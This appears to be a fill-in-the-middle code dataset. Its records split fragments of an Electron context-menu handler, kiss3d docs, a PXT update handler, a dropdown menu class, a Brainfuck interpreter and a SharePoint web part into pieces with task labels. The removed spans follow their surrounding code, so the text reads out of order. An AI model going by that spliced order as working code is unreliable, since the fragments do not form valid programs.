sharedState.extensionMenu[extensionId].sort((a,b) => (a.properties.count || 99) - (b.properties.count || 99))
//TODO onClick
cb()
})
ipcFuncMain('contextMenus', 'update', (e, extensionId, id, updateProperties) => {
const menu = sharedState.extensionMenu[extensionId]
if(menu){
const item = menu.find(propeties=>propeties.id === id || propeties.menuItemId === id)
if(item) Object.assign(item.properties,updateProperties)
}
})
ipcFuncMain('contextMenus', 'remove', (e, extensionId, menuItemId) => {
const menu = sharedState.extensionMenu[extensionId]
if(menu){
const i = menu.findIndex(propeties=>propeties.menuItemId === menuItemId || propeties.id === menuItemId)
if(i != -1) menu.splice(i,1)
}
})
ipcFuncMain('contextMenus', 'removeAll', (e, extensionId) => {
console.log('contextMenu', 'removeAll', extensionId) | delete sharedState.extensionMenu[extensionId]
}) | random_line_split |
|
lib.rs | /*!
# Kiss3d
Keep It Simple, Stupid 3d graphics engine.
This library is born from the frustration in front of the fact that today’s 3D
graphics library are:
* either too low level: you have to write your own shaders and opening a
window steals you 8 hours, 300 lines of code and 10L of coffee.
* or high level but too hard to understand/use: those are libraries made to
write beautiful animations or games. They have a lot of feature; too much
feature if you only want to draw a few geometries on the screen.
**kiss3d** is not designed to be feature-complete or fast.
It is designed to be able to draw simple geometric figures and play with them
with one-liners.
An on-line version of this documentation is available [here](http://kiss3d.org).
## Features
Most features are one-liners.
* WASM compatibility.
* open a window with a default arc-ball camera and a point light.
* a first-person camera is available too and user-defined cameras are possible.
* display boxes, spheres, cones, cylinders, quads and lines.
* change an object color or texture.
* change an object transform (we use the [nalgebra](http://nalgebra.org) library
to do that).
* create basic post-processing effects.
As an example, having a red, rotating cube with the light attached to the camera is as simple as (NOTE: this will **not** compile when targeting WASM):
```no_run
extern crate kiss3d;
extern crate nalgebra as na;
use na::{Vector3, UnitQuaternion};
use kiss3d::window::Window;
use kiss3d::light::Light;
fn main() {
let mut window = Window::new("Kiss3d: cube");
let mut c = window.add_cube(1.0, 1.0, 1.0); |
c.set_color(1.0, 0.0, 0.0);
window.set_light(Light::StickToCamera);
let rot = UnitQuaternion::from_axis_angle(&Vector3::y_axis(), 0.014);
while window.render() {
c.prepend_to_local_rotation(&rot);
}
}
```
The same example, but that will compile for both WASM and native platforms is slightly more complicated because **kiss3d** must control the render loop:
```no_run
extern crate kiss3d;
extern crate nalgebra as na;
use kiss3d::light::Light;
use kiss3d::scene::SceneNode;
use kiss3d::window::{State, Window};
use na::{UnitQuaternion, Vector3};
struct AppState {
c: SceneNode,
rot: UnitQuaternion<f32>,
}
impl State for AppState {
fn step(&mut self, _: &mut Window) {
self.c.prepend_to_local_rotation(&self.rot)
}
}
fn main() {
let mut window = Window::new("Kiss3d: wasm example");
let mut c = window.add_cube(1.0, 1.0, 1.0);
c.set_color(1.0, 0.0, 0.0);
window.set_light(Light::StickToCamera);
let rot = UnitQuaternion::from_axis_angle(&Vector3::y_axis(), 0.014);
let state = AppState { c, rot };
window.render_loop(state)
}
```
Some controls are handled by default by the engine (they can be overridden by the user):
* `scroll`: zoom in / zoom out.
* `left click + drag`: look around.
* `right click + drag`: translate the view point.
* `enter`: look at the origin (0.0, 0.0, 0.0).
## Compilation
You will need the last stable build of the [rust compiler](http://www.rust-lang.org)
and the official package manager: [cargo](https://github.com/rust-lang/cargo).
Simply add the following to your `Cargo.toml` file:
```text
[dependencies]
kiss3d = "0.24"
```
## Contributions
I’d love to see people improving this library for their own needs. However, keep in mind that
**kiss3d** is KISS. One-liner features (from the user point of view) are preferred.
## Acknowledgements
Thanks to all the Rustaceans for their help, and their OpenGL bindings.
*/
#![deny(non_camel_case_types)]
#![deny(unused_parens)]
#![allow(non_upper_case_globals)]
#![deny(unused_qualifications)]
#![warn(missing_docs)] // FIXME: should be denied.
#![warn(unused_results)]
#![allow(unused_unsafe)] // FIXME: should be denied
#![allow(missing_copy_implementations)]
#![doc(html_root_url = "http://kiss3d.org/doc")]
#[macro_use]
extern crate bitflags;
extern crate nalgebra as na;
extern crate num_traits as num;
extern crate rusttype;
#[macro_use]
extern crate serde_derive;
extern crate serde;
#[cfg(feature = "conrod")]
pub extern crate conrod_core as conrod;
#[cfg(not(target_arch = "wasm32"))]
extern crate glutin;
extern crate instant;
#[cfg(feature = "conrod")]
pub use conrod::widget_ids;
pub use nalgebra;
pub use ncollide3d;
#[deprecated(note = "Use the `renderer` module instead.")]
pub use crate::renderer::line_renderer;
#[deprecated(note = "Use the `renderer` module instead.")]
pub use crate::renderer::point_renderer;
pub mod builtin;
pub mod camera;
pub mod context;
mod error;
pub mod event;
pub mod light;
pub mod loader;
pub mod planar_camera;
pub mod planar_line_renderer;
pub mod post_processing;
pub mod renderer;
pub mod resource;
pub mod scene;
pub mod text;
pub mod window; | random_line_split |
|
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> |
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
} | identifier_body |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function | (projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | initElectron | identifier_name |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult);
}
if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) |
} | {
pxtElectron.sendOpenDevTools();
} | conditional_block |
electron.ts | import Cloud = pxt.Cloud;
import * as cmds from "./cmds";
import * as core from "./core";
import { ProjectView } from "./srceditor";
const pxtElectron: pxt.electron.PxtElectron = (window as any).pxtElectron;
const downloadingUpdateLoadingName = "pxtelectron-downloadingupdate";
export function initElectron(projectView: ProjectView): void {
if (!pxt.BrowserUtils.isPxtElectron()) {
return;
}
pxtElectron.onTelemetry((ev: pxt.electron.TelemetryEvent) => {
pxt.tickEvent(ev.event, ev.data);
});
pxtElectron.onUpdateInstalled(() => {
core.infoNotification(lf("An update will take effect after the app restarts"))
});
pxtElectron.onDriveDeployResult((isSuccess) => {
if (!deployingDeferred) {
pxt.tickEvent("electron.drivedeploy.unknowndeployoperation");
return;
}
if (isSuccess) {
pxt.tickEvent("electron.drivedeploy.success");
deployingDeferred.resolve();
} else {
pxt.tickEvent("electron.drivedeploy.failure");
const err = new Error("electron drive deploy failed");
deployingDeferred.reject(err);
}
});
const criticalUpdateFailedPromise = new Promise<void>((resolve) => {
pxtElectron.onCriticalUpdateFailed(() => {
pxt.tickEvent("electron.criticalupdate.failed");
resolve();
});
});
// Asynchronously check what the update status is, which will let us know if the current version is banned
pxtElectron.onUpdateStatus((status) => {
pxt.debug(`Electron app update status: ${status}`);
pxt.tickEvent(`electron.updatestatus.${status}`);
if (status === pxt.electron.UpdateStatus.UpdatingCritical || status === pxt.electron.UpdateStatus.BannedWithoutUpdate) {
projectView.stopSimulator();
}
switch (status) {
case pxt.electron.UpdateStatus.UpdateAvailable:
// Downloading update in background; nothing to do
case pxt.electron.UpdateStatus.Ok:
// No update available; nothing to do
return;
case pxt.electron.UpdateStatus.UpdatingCritical:
// App is installing a critical update; show a dialog asking the user to wait
core.confirmAsync({
header: lf("Critical update required"),
body: lf("A critical update is installing. Please do not quit the app. It will automatically restart when the update has completed."),
hideAgree: true,
disagreeLbl: lf("Ok"),
disagreeClass: "green",
size: "large"
}).then(() => {
core.showLoading("pxt-electron-update", lf("Installing update..."));
});
criticalUpdateFailedPromise
.then(() => {
core.hideLoading("pxt-electron-update");
core.hideDialog();
core.confirmAsync({
header: lf("Critical update failed"),
body: lf("There was an error installing the critical update. Please ensure you are connected to the Internet and try again later."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
});
// Don't do anything; app will quit and restart once the update is ready
break;
case pxt.electron.UpdateStatus.BannedWithoutUpdate:
// Current version is banned and there are no updates available; show a dialog explaining the
// situation and quit
core.confirmAsync({
header: lf("Critical update required"),
body: lf("We have disabled this app for security reasons. Please ensure you are connected to the Internet and try again later. An update will be automatically installed as soon as it is available."),
hideAgree: true,
disagreeLbl: lf("Quit"),
disagreeClass: "red",
size: "large"
}).then(b => {
pxtElectron.sendQuit();
});
default:
// Unknown status; no-op
return;
}
});
pxtElectron.sendUpdateStatusCheck();
}
let deployingDeferred: pxt.Util.DeferredPromise<void> = null;
export function driveDeployAsync(compileResult: pxtc.CompileResult): Promise<void> {
if (!pxt.BrowserUtils.isPxtElectron()) {
return cmds.browserDownloadDeployCoreAsync(compileResult); | if (!deployingDeferred) {
deployingDeferred = pxt.Util.defer<void>();
pxtElectron.sendDriveDeploy(compileResult);
}
return deployingDeferred.promise
.catch((e) => {
pxt.tickEvent("electron.drivedeploy.browserdownloadinstead");
return cmds.browserDownloadDeployCoreAsync(compileResult);
})
.finally(() => {
deployingDeferred = null;
});
}
export function openDevTools(): void {
if (pxtElectron) {
pxtElectron.sendOpenDevTools();
}
} | }
| random_line_split |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void |
private changeToogleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| {
this.changeToogleIcon();
this.root.classList.toggle("neos-dropdown-open");
} | identifier_body |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
this.changeToogleIcon();
this.root.classList.toggle("neos-dropdown-open");
}
private changeToogleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) |
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
} | conditional_block |
DropdownMenu.ts | export default class DropDownMenu {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
this.changeToogleIcon();
this.root.classList.toggle("neos-dropdown-open");
} | if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
} |
private changeToogleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up"); | random_line_split |
DropdownMenu.ts | export default class | {
protected root?: HTMLElement;
protected button?: Array<HTMLElement>;
protected menu?: Array<HTMLElement>;
constructor(_root: HTMLElement) {
this.root = _root;
this.button = Array.from(
this.root.querySelectorAll(".neos-dropdown-toggle")
);
this.menu = Array.from(this.root.querySelectorAll(".neos-dropdown-menu"));
this.setupEventListeners();
}
private setupEventListeners(): void {
this.button.forEach((_toggleButton: HTMLElement) => {
_toggleButton.addEventListener("click", this.toggle.bind(this));
});
}
private toggle(_event: Event): void {
this.changeToogleIcon();
this.root.classList.toggle("neos-dropdown-open");
}
private changeToogleIcon(): void {
const openIcon: HTMLElement = this.root.querySelector(".fa-chevron-down");
const closeIcon: HTMLElement = this.root.querySelector(".fa-chevron-up");
if (openIcon) {
openIcon.classList.replace("fa-chevron-down", "fa-chevron-up");
}
if (closeIcon) {
closeIcon.classList.replace("fa-chevron-up", "fa-chevron-down");
}
}
}
| DropDownMenu | identifier_name |
interpreter.rs | use std::io::{Read, stdin};
use operations::Op;
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
let m = (0 .. 30000).map(|_| 0).collect();
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
_ => panic!("boom"),
}
program_counter += 1;
}
println!("");
}
fn left(&mut self) {
self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn decrement(&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) |
}
| {
let mut bal = 0i32;
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
} | identifier_body |
interpreter.rs | use std::io::{Read, stdin};
use operations::Op;
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
let m = (0 .. 30000).map(|_| 0).collect();
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
_ => panic!("boom"),
}
program_counter += 1;
}
println!("");
}
fn left(&mut self) {
self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn | (&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) {
let mut bal = 0i32;
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
}
}
| decrement | identifier_name |
interpreter.rs | use std::io::{Read, stdin};
use operations::Op;
pub struct Interpreter {
memory: Vec<u8>,
pointer: i64,
ops: Vec<Op>,
}
impl Interpreter {
pub fn new(ops: Vec<Op>) -> Interpreter {
let m = (0 .. 30000).map(|_| 0).collect();
Interpreter { memory: m, pointer: 0, ops: ops }
}
pub fn run(&mut self) {
let mut program_counter = 0;
while program_counter < self.ops.len() {
match self.ops[program_counter] {
Op::Increment => self.increment(),
Op::Decrement => self.decrement(),
Op::Output => self.output(),
Op::Right => self.right(),
Op::Left => self.left(),
Op::Input => self.input(),
Op::Jump => self.jump(&mut program_counter),
Op::JumpBack => self.jump_back(&mut program_counter),
_ => panic!("boom"),
}
program_counter += 1;
}
println!(""); | self.pointer -= 1;
}
fn right(&mut self) {
self.pointer += 1;
}
fn input(&mut self) {
let mut input = String::new();
stdin()
.read_line(&mut input).ok().expect("Error reading user input");
self.memory[self.pointer as usize] = input.bytes().next().expect("no byte read") as u8;
}
fn increment(&mut self) {
self.memory[self.pointer as usize] += 1;
}
fn decrement(&mut self) {
self.memory[self.pointer as usize] -= 1;
}
fn output(&self) {
print!("{}", (self.memory[self.pointer as usize]) as char);
}
fn jump(&mut self, program_counter: &mut usize) {
let mut bal = 1i32;
if self.memory[self.pointer as usize] == 0u8 {
loop {
*program_counter += 1;
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
if bal == 0 {
break;
}
}
}
}
fn jump_back(&mut self, program_counter: &mut usize) {
let mut bal = 0i32;
loop {
if self.ops[*program_counter] == Op::Jump {
bal += 1;
} else if self.ops[*program_counter] == Op::JumpBack {
bal -= 1;
}
*program_counter -= 1;
if bal == 0 {
break;
}
}
}
} | }
fn left(&mut self) { | random_line_split |
MetadataNewsWebPart.ts | import * as React from 'react';
import * as ReactDom from 'react-dom';
import { Version } from '@microsoft/sp-core-library';
import {
BaseClientSideWebPart,
IPropertyPaneConfiguration,
PropertyPaneTextField,
PropertyPaneChoiceGroup,
PropertyPaneCheckbox,
PropertyPaneCustomField,
PropertyPaneFieldType,
PropertyPaneHorizontalRule,
PropertyPaneToggle
} from '@microsoft/sp-webpart-base';
import * as strings from 'MetadataNewsWebPartStrings';
import MetadataNews from './components/MetadataNews';
import { IMetadataNewsProps } from '../../interfaces';
import * as pnp from '@pnp/sp';
import { override } from '@microsoft/decorators';
export default class MetadataNewsWebPart extends BaseClientSideWebPart<IMetadataNewsProps> {
private lookupsFetched: boolean;
protected onInit(): Promise<void> {
return new Promise((resolve, reject) => {
if (this.properties.ItemLimit === undefined) {
this.properties.ItemLimit = 5;
this.properties.ItemHeight = "180";
this.properties.RefinerInfos = [];
this.properties.AdditionalFilter = null;
this.properties.HideRefinerFromItemCard = null;
}
if (this.properties.containerWidth === undefined) {
this.properties.containerWidth = "900";
}
if (this.properties.multiColumn === undefined) {
this.properties.multiColumn = false;
}
pnp.sp.setup({
sp: {
headers: {
Accept: 'application/json;odata=verbose'
},
baseUrl: this.context.pageContext.web.absoluteUrl
}
});
this.properties.webUrl = this.context.pageContext.web.absoluteUrl;
resolve();
});
}
@override
public onDispose() {
super.onDispose();
}
public render(): void {
const element: React.ReactElement<IMetadataNewsProps> = React.createElement(MetadataNews, this.properties);
ReactDom.render(element, this.domElement);
}
